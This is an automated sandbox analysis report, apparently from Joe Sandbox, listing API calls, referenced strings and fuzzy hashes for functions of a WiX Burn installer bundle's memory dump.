GetProcessHeap.KERNEL32(?,?,?,?,0065226D,?,?,00000001,7707B390,8000FFFF,?,?,00690267,?,?,00000000), ref: 00653B04
RtlReAllocateHeap.NTDLL(00000000,?,0065226D,?,?,00000001,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653B0B

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 5aa331e38d753a23bd929ca903897b9e23c17547b083918c8596a86be9af1e5b
Instruction ID: 5b66df6baff7274ee29dbf46516285a81d93fd6c2149fc7ce2abd5446539ff40
Opcode Fuzzy Hash: 5aa331e38d753a23bd929ca903897b9e23c17547b083918c8596a86be9af1e5b
Instruction Fuzzy Hash: 6CD0123215420DEBCF005FE8ED0DDBE3BADFB58602704940AF915C2520C73DE4209B64

Function 0065394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00652274,?,00000001,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653960
RtlAllocateHeap.NTDLL(00000000,?,00652274,?,00000001,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653967

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 635b6c12ebcac3fad49d6536fc1a1ab676bbceb66bbf2fdac870b8651e584f9d
Instruction ID: cd360dccc9d5fcc1a957aacf0674bbdae3f942a3e4dd3b1e713a8ac51bd884e0
Opcode Fuzzy Hash: 635b6c12ebcac3fad49d6536fc1a1ab676bbceb66bbf2fdac870b8651e584f9d
Instruction Fuzzy Hash: 61C012321A420CAB8B006FF8EC0EC9A3BADBB28A02704A402B905C2520C738E0108B60

Function 006935C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006935F8

Part of subcall function 0069304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00693609,00000000,?,00000000), ref: 00693069
Part of subcall function 0069304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0067C025,?,00655405,?,00000000,?), ref: 00693075

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: ae1a40f2b863ca85fe203c5b46c6464cc9975fe7e1b0b8166bc39196d6256be3
Instruction ID: b42381d608410ffa83980b538a4c3e5235baee66dff9ffc35e6221ed7faf2276
Opcode Fuzzy Hash: ae1a40f2b863ca85fe203c5b46c6464cc9975fe7e1b0b8166bc39196d6256be3
Instruction Fuzzy Hash: A5313E76E00229AFCB11DFA8C884ADEB7F9EF09710F01456AED15FB311D6759D008BA4

Function 00695870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,006BAAA0,00000000,80070490,?,?,00668B19,WiX\Burn,PackageCache,00000000,006BAAA0,00000000,00000000,80070490), ref: 006958CA

Part of subcall function 006910B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0069112B
Part of subcall function 006910B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00691163

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: 2c544a2853de5d0c9850f46b67af24da38716550264d542b93eccafba1c9bd2b
Instruction ID: 01be3241e547912489b5973e966ddea7f12a212bfeff92922d3e6f439eff5e31
Opcode Fuzzy Hash: 2c544a2853de5d0c9850f46b67af24da38716550264d542b93eccafba1c9bd2b
Instruction Fuzzy Hash: 7C115136C0063AEF8F236E94DA455EEBB6EEB04320B15417AED4367611C7314E60E7D5

Function 006534B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00668BD3,0000001C,80070490,00000000,00000000,80070490), ref: 006534D5

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: a7fa86851024cf83c82c7701bf778e6c91ea645269e39da76c46e61fed64d522
Instruction ID: a0d3150e745aaece6e1f0e7021e9d17ffeeef28c328c4daa5a0344989025eb0c
Opcode Fuzzy Hash: a7fa86851024cf83c82c7701bf778e6c91ea645269e39da76c46e61fed64d522
Instruction Fuzzy Hash: B7E02B722002353BE7426F615C05DEB3BCEDF06795F008015FE00D6100D372D50493B5

Function 006514B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,006521A8,?,00000000,?,00000000,?,0065390C,00000000,?,00000104), ref: 006514E8

Part of subcall function 00653BD3: GetProcessHeap.KERNEL32(00000000,?,?,006521CC,?,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653BDB
Part of subcall function 00653BD3: HeapSize.KERNEL32(00000000,?,006521CC,?,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653BE2

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 66957c4a5f5b36d3af41294f3977f21d91a51ceeba4c6f972742eb4f9b4681b8
Instruction ID: a8714bfd1eef45d7d4906b1141a06e2f65bb1e519cd12a7ca809d8c1fd996282
Opcode Fuzzy Hash: 66957c4a5f5b36d3af41294f3977f21d91a51ceeba4c6f972742eb4f9b4681b8
Instruction Fuzzy Hash: CB016D77200228ABCF115E54ECC0FDA77AB9F86752F104219FE265F351E7319C0986D4

Non-executed Functions

Function 0069710D Relevance: 45.8, APIs: 11, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,006B3E78,000000FF,?,?,?), ref: 006971D4
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 006971F9
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00697219
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00697235
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 0069725D
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00697279
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 006972B2
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 006972EB

Part of subcall function 00696D50: SysFreeString.OLEAUT32(00000000), ref: 00696E89
Part of subcall function 00696D50: SysFreeString.OLEAUT32(00000000), ref: 00696EC8

SysFreeString.OLEAUT32(00000000), ref: 0069736F
SysFreeString.OLEAUT32(00000000), ref: 0069741F

Strings

summary, xrefs: 006971EB
author, xrefs: 00697138, 0069726B
msi.dll, xrefs: 00697137
published, xrefs: 00697227
clbcatq.dll, xrefs: 00697242
updated, xrefs: 0069724F
version.dll, xrefs: 00697133
category, xrefs: 00697155, 006972A4
atomutil.cpp, xrefs: 0069740C
feclient.dll, xrefs: 00697206
link, xrefs: 00697172, 0069731D
cabinet.dll, xrefs: 00697150
content, xrefs: 006972DD
title, xrefs: 0069720B
(, xrefs: 0069734A

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: String$Compare$Free
String ID: ($atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
API String ID: 318886736-4294603148
Opcode ID: 8c1a4f156ecf47ba0b341667edf02d561d8c12a4725f590dd0a3ab664e74acd3
Instruction ID: 0789ba0a5d74b86e52bbfbb9f480776b922480b7ccbd407c2f75bb34430e2c6f
Opcode Fuzzy Hash: 8c1a4f156ecf47ba0b341667edf02d561d8c12a4725f590dd0a3ab664e74acd3
Instruction Fuzzy Hash: 70A18071958216FBDF219BA4CC41FAD7B7AAF04730F204355F920AAAD1DB70EA50DB90

Function 00698134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 00698161
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0069817C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 0069821F
CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,0069B518,00000000), ref: 0069825E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 006982B1
CompareStringW.KERNEL32(0000007F,00000000,0069B518,000000FF,true,000000FF), ref: 006982CF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 00698307
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 0069844B

Strings

http://appsyndication.org/2006/appsyn, xrefs: 00698154
apuputil.cpp, xrefs: 0069836E
type, xrefs: 006981A7
enclosure, xrefs: 00698439
true, xrefs: 006982C1
upgrade, xrefs: 00698211
exclusive, xrefs: 006982A3
version, xrefs: 00698250, 006982F9
application, xrefs: 0069816E

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CompareString
String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
API String ID: 1825529933-3037633208
Opcode ID: 7e08d05efbd0dfa77fc78c7428b6b6a68e6111d3708567dcd77b37e3ace56ff3
Instruction ID: 94ebac58367135178fd68a3fc6d5453d8c1ef27399aa0b9091d28e7115b351e4
Opcode Fuzzy Hash: 7e08d05efbd0dfa77fc78c7428b6b6a68e6111d3708567dcd77b37e3ace56ff3
Instruction Fuzzy Hash: 74B18C31604606AFCF608F54CC81F9A7BABAF45B30F214669F925EBAD1DB70E841CB44

Function 0065A03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0065A0B6

Strings

Failed to enumerate related products for upgrade code., xrefs: 0065A0F1
Product or related product not found: %ls, xrefs: 0065A1A1
Trying per-user extended info for property '%ls' for product: %ls, xrefs: 0065A175
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 0065A148
Failed to get product info., xrefs: 0065A1E3
Unsupported product search type: %u, xrefs: 0065A07E
State, xrefs: 0065A098
Failed to change value type., xrefs: 0065A21D
Failed to format GUID string., xrefs: 0065A0C1
AssignmentType, xrefs: 0065A091
VersionString, xrefs: 0065A0A6, 0065A131, 0065A147, 0065A15B, 0065A174, 0065A188
Language, xrefs: 0065A09F
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0065A24F
Failed to copy upgrade code., xrefs: 0065A116
Failed to set variable., xrefs: 0065A23C

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16
String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2134270738
Opcode ID: 9350dde36e6d1c77e816d9a816dc5228e32d31a8ec0b7c0fac2af66dfa5cdbbe
Instruction ID: 1d409e49ad3038508fe4f32a2a58b8c6dda29635f7e41a907368d8cd6af677a9
Opcode Fuzzy Hash: 9350dde36e6d1c77e816d9a816dc5228e32d31a8ec0b7c0fac2af66dfa5cdbbe
Instruction Fuzzy Hash: EF61E032D40119FBCF219AE88D56DEE7B6BAB04711F140269FD04BA641C2339F099796

Function 0066F051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 0065394F: GetProcessHeap.KERNEL32(?,?,?,00652274,?,00000001,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653960
Part of subcall function 0065394F: RtlAllocateHeap.NTDLL(00000000,?,00652274,?,00000001,7707B390,8000FFFF,?,?,00690267,?,?,00000000,00000000,8000FFFF), ref: 00653967

EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 0066F06E
LeaveCriticalSection.KERNEL32(?), ref: 0066F19B

Strings

Failed to copy the arguments., xrefs: 0066F12D
EngineForApplication.cpp, xrefs: 0066F17C
Failed to post launch approved exe message., xrefs: 0066F186
Failed to copy the id., xrefs: 0066F100
UX requested unknown approved exe with id: %ls, xrefs: 0066F0CE
Engine is active, cannot change engine state., xrefs: 0066F089

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterLeaveProcess
String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
API String ID: 1367039788-528931743
Opcode ID: 14cace7f8d93ecb192a908b6a23835e01b46d510e8b81431c7d30d4d52c55327
Instruction ID: 1881368d4bacfe7113d99fa5eb19790878f54b3436ea79a480eb1e120c50d836
Opcode Fuzzy Hash: 14cace7f8d93ecb192a908b6a23835e01b46d510e8b81431c7d30d4d52c55327
Instruction Fuzzy Hash: E231D532A40225EFDB61AF64EC05E6AB7AEAF05B60F014465FD04EB251EB71DD008BE4

Function 00656037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00656062
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00656076
GetLastError.KERNEL32 ref: 00656088
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 006560DC
GetLastError.KERNEL32 ref: 006560E6

Strings

Failed to set variant value., xrefs: 00656124
variable.cpp, xrefs: 006560A3, 00656101
Failed to get the Date., xrefs: 0065610B
Failed to allocate the buffer for the Date., xrefs: 006560C4
Failed to get the required buffer length for the Date., xrefs: 006560AD

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: DateErrorFormatLast$SystemTime
String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
API String ID: 2700948981-3682088697
Opcode ID: 8146f55292d0ab5250d410dd75c66c8ba7823c5fd9494755ae9d77bce6d28986
Instruction ID: 4a40eee8dcd54ce31545364be08241d9a615400dd8d1026e92009ad00b578c9d
Opcode Fuzzy Hash: 8146f55292d0ab5250d410dd75c66c8ba7823c5fd9494755ae9d77bce6d28986
Instruction Fuzzy Hash: 16310932A406297BDF219BE9CD42EBFBA6FAB04711F410029FE01F7280D6309D44C6E1

Function 006641EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00690523: EnterCriticalSection.KERNEL32(006BB5FC,00000000,?,?,?,00664207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,006554FA,?), ref: 00690533
Part of subcall function 00690523: LeaveCriticalSection.KERNEL32(006BB5FC,?,?,006BB5F4,?,00664207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,006554FA,?), ref: 0069067A

OpenEventLogW.ADVAPI32(00000000,Application), ref: 00664212
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0066421E
ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,006A39D4,00000000), ref: 0066426B
CloseEventLog.ADVAPI32(00000000), ref: 00664272

Strings

logging.cpp, xrefs: 00664242
_Failed, xrefs: 006641F7
Application, xrefs: 0066420C
Failed to open Application event log, xrefs: 0066424C
Setup, xrefs: 006641FC
txt, xrefs: 006641F2

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
API String ID: 1844635321-1389066741
Opcode ID: 365e65a92bbe678b1dece915a9948a80a18609239d14393e5278ac058f7bbebf
Instruction ID: 68eefb0ec7a3f8abbe03dfcef506bca9b9a9b11da12579f0beb5ccedcac30e8b
Opcode Fuzzy Hash: 365e65a92bbe678b1dece915a9948a80a18609239d14393e5278ac058f7bbebf
Instruction Fuzzy Hash: B4F0DC32A812717A673236622D1AEBB596FDA93F617130019FD00E1680EB408E0288F8

Function 0066A13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON

Download Yara Rule

Strings

Failed to combine last source with source., xrefs: 0066A210
Failed to combine layout source with source., xrefs: 0066A2A4
WixBundleLastUsedSource, xrefs: 0066A1A1
WixBundleOriginalSource, xrefs: 0066A1B7
Failed to get current process directory., xrefs: 0066A1F3
WixBundleLayoutDirectory, xrefs: 0066A26C
Failed to copy source path., xrefs: 0066A31A
Failed to get bundle layout directory property., xrefs: 0066A287

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Find$CloseFileFirstlstrlen
String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
API String ID: 2767606509-3003062821
Opcode ID: 4feaf4830e729ca5147f91eacc139c072828d5703e6dfef246aa3ebd8400ea09
Instruction ID: 8d27c48e09594742eb143b3768372aa706297e2ac7ffe8fd8b73ee398cbf19aa
Opcode Fuzzy Hash: 4feaf4830e729ca5147f91eacc139c072828d5703e6dfef246aa3ebd8400ea09
Instruction Fuzzy Hash: A0716B71D00219AFCF16AFE8D851AEEBBBAAF09310F150129E901F7350E7719E418F66

Function 00653076 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 006530C1
GetLastError.KERNEL32 ref: 006530C7
ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00653121
GetLastError.KERNEL32 ref: 00653127
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006531DB
GetLastError.KERNEL32 ref: 006531E5
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0065323B
GetLastError.KERNEL32 ref: 00653245

Strings

pathutil.cpp, xrefs: 006530EB

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: pathutil.cpp
API String ID: 1547313835-741606033
Opcode ID: 711f46230a5cb9de15c66f08462c1e35a447e944e659c58af9fd9970681f3646
Instruction ID: 74642771de55d4fddb53db27103e4e1748933c5a0d988e3f870662f59f7ac1af
Opcode Fuzzy Hash: 711f46230a5cb9de15c66f08462c1e35a447e944e659c58af9fd9970681f3646
Instruction Fuzzy Hash: 7061C533D00A39ABDB219AE48D45BDEBB6AAB04F92F114155EE00BB350E731DF0897D4

Function 006650CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,?,?,0069B500), ref: 006650D3
GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 00665171
CloseHandle.KERNEL32(00000000), ref: 0066518A

Strings

-q -%ls %ls %ls %u, xrefs: 006650F8
runas, xrefs: 00665131
Failed to launch elevated child process: %ls, xrefs: 0066515E
open, xrefs: 0066513B, 00665149
burn.elevated, xrefs: 006650F3
Failed to allocate parameters for elevated process., xrefs: 0066510C

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Process$CloseCurrentHandle
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2815245435-1352204306
Opcode ID: 70b80f6c3407e6600bf11ffdff243aaf2bdea8079bd1b8ef2002936b6c78095b
Instruction ID: 9b53fd2eb1808cff162338478c284608749879250022f253669b413f991189df
Opcode Fuzzy Hash: 70b80f6c3407e6600bf11ffdff243aaf2bdea8079bd1b8ef2002936b6c78095b
